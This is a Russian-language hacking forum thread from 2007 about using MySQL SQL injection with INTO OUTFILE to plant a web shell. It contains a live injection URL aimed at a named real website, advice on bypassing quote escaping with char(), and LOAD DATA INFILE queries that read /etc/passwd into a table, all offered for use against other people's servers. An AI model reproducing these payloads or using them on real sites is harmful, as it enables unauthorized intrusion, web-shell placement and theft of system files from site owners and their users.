28.02.2007, 09:17
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
2_Pantera_
ну потести на каком нить серве поставь себе mysql и phpmyadmin
into outfile работает как `(%60) так и с ' (%27) кавычками с "(%22) не пробывал но по идее тоже должно работать.
Посмотри внизу статьи полный путь до www зачем что то инлудить???
|
|
|
28.02.2007, 09:35
|
|
Участник форума
Регистрация: 06.10.2006
Сообщений: 226
С нами:
10313606
Репутация:
1327
|
|
работает ' и " а ковычки ` не работают я проверял, а ' (%27) и "(%22) воспринимается браузером одинаково
можешь сам потестить
http://www.caduser.ru/acad/index.php?ver_id=1+union+select+1,'qqqqqqqq',3,4+f rom+mysql.user+into+outfile+"/tmp/file111.php"--
а инклудить надо для того что б шелл запустить, ведь он лижит не на сайте, а в /tmp
ps попробуй на этом сайте проинклудить у меня не получилось если что стукне мне в аську или в пм
Последний раз редактировалось _Pantera_; 28.02.2007 в 09:38..
|
|
|
|
28.02.2007, 11:47
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
С нами:
10140086
Репутация:
36
|
|
еще экранирование кавычек (т.е. magic_quotes_gpc = On) можно обойти с помощью char().
|
|
|
|
28.02.2007, 11:50
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами:
11272646
Репутация:
1384
|
|
Сообщение от [ cash ]
Способ №2
Спсоб №3
ps обновил
Посути это точно такой же способ, только в первом случае возможно добавление дополнительных символов в сохраняемый файл, которые просто так, к примеру, не получилось добавить, ну а второй, просто называется по другому, в любом случае, главного недостатка (неработаспособности при экранировании) они не лишены и отдельными способами заливки шела их выносить не стоит.
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
28.02.2007, 11:51
|
|
Умиротворенн
Регистрация: 09.12.2004
Сообщений: 996
С нами:
11272646
Репутация:
1384
|
|
Сообщение от andy13
еще экранирование кавычек (т.е. magic_quotes_gpc = On) можно обойти с помощью char().
Открой глаза, выше написано что при сохранении нельзя, а разговор сейчас именно об этом.
__________________
http://madnet.name - madnet - blog | homepage (Мысли, релизы, скрипты, софт)
http://antichat.ru - Лучший сайт по безопасности
irc.antichat.ru:7771 #antichat - общение online
ГАРАНТ ФОРУМА
|
|
|
|
28.02.2007, 12:16
|
|
Banned
Регистрация: 27.06.2006
Сообщений: 1,614
С нами:
10459106
Репутация:
2996
|
|
2andy13
наркоман?
2madnet
Я не борюсь за звание супер хакера я делюсь своими знаниями с теми кто знает меньше меня. Я знаю недостаки этих спасобов и что написанно много статей я пытался только помочь тем кто разбираеться меньше, если вы считаете эту статью недостойной то просто удалите ее. Многие из AMA SM вообще нечего не пишут хотя античат думаю один из лучших he порталов со статьями.
2all
Если кто то из вас может дополнить то напишите, а говорить что это уже все знают смысл?
Последний раз редактировалось [ cash ]; 28.02.2007 в 12:19..
|
|
|
|
28.02.2007, 12:32
|
|
Участник форума
Регистрация: 04.02.2007
Сообщений: 120
С нами:
10140086
Репутация:
36
|
|
2madnet: да, действительно, я имел в виду обход кавычек при чтении файлов.
не обратил внимание.
2[ cash ]: нет
|
|
|
|
24.04.2007, 13:36
|
|
Banned
Регистрация: 01.08.2006
Сообщений: 725
С нами:
10408706
Репутация:
4451
|
|
Если файл не удается прочитать можно попробовать его в таблицу запихнуть
PHP код:
LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table FIELDS TERMINATED BY ',' ENCLOSED BY '"' LINES TERMINATED BY '\n'
LOAD DATA INFILE '/etc/passwd' INTO TABLE hack.table (colum1,column2)
Если mysql ниже 3.2 то надо делать так
PHP код:
LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE hack.table
А использование INTO DUMPFILE вместо INTO OUTFILE делает дамп неразборчивым для чтения тк идет без ограничитей строк и стоблцов,это для BLOB данных.И кстати наиболее всего
PHP код:
SELECT DATA INTO OUTFILE '/tmp/hack.txt' FIELDS TERMINATED BY ',' OPIONALLY ENCLODES BY '"' LINES TERMINATED BY '\n' FROM hack.table
|
|
|
|
21.05.2007, 00:45
|
|
Banned
Регистрация: 02.03.2007
Сообщений: 38
С нами:
10102018
Репутация:
-12
|
|
интереснинькая статься - только сколько я не пробовал ети инекции всегда неполучалось в месте когда цыфры вводить нужно - поля не менялись - кто знает в чем трабла?
|
|
|
|
17.07.2007, 04:36
|
|
Познающий
Регистрация: 23.11.2005
Сообщений: 84
С нами:
10770545
Репутация:
4
|
|
плз, выложите кто-нибудь видео ешё раз!
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
